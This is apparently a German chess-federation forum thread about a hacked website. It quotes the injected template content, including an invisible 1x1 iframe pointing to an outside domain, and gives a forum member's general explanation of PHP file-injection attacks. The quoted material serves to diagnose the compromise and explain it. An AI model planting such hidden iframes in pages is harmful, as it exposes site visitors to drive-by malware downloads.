{PROJECT}/template/normal.ini
{TITEL}Deutscher Schachbund - Aktuelle Nachrichten
{SCRIPT}/news/index.php
{CONTENT}<html><body><iframe src="http://axstat.com/" width="1" height="1" frameborder="0"></iframe></body></html>http://axstat.com/
http://www.lendingtree.com/
http://aline77nmw.co.cc/
Frank Hoppe hat geschrieben:In den Logfiles finden sich zu Hunderten solche Angriffe. Da wird versucht, vor allen Dingen populäre PHP-Skripte mit Parametern zu bombardieren. Hier liegt in der Regel der Quellcode offen und meistens veröffentlichen die Hersteller auch noch die Schwachpunkte ihrer Skripte, wenn sie einen Bugfix liefern. Die Skriptkiddies lesen das und suchen nun im Internet genau nach diesen Skripten. Dann beginnt der Angriff und eine Datei mit PHP-Code wird auf dem Server eingeschleust. Danach ruft der Angreifer die eingeschleuste Datei auf und hat Vollzugriff auf das System. Er könnte nun z.B. alles löschen oder Dateien modifizieren. Meistens ist der hinzugefügte Code ein eingebettetes Frame, welches zu einer Fremddomain verlinkt, von der ein Virus oder Trojaner nachgeladen wird, der sich im schlimmsten Fall im System des Besuchers einnistet.
Mitglieder in diesem Forum: 0 Mitglieder und 2 Gäste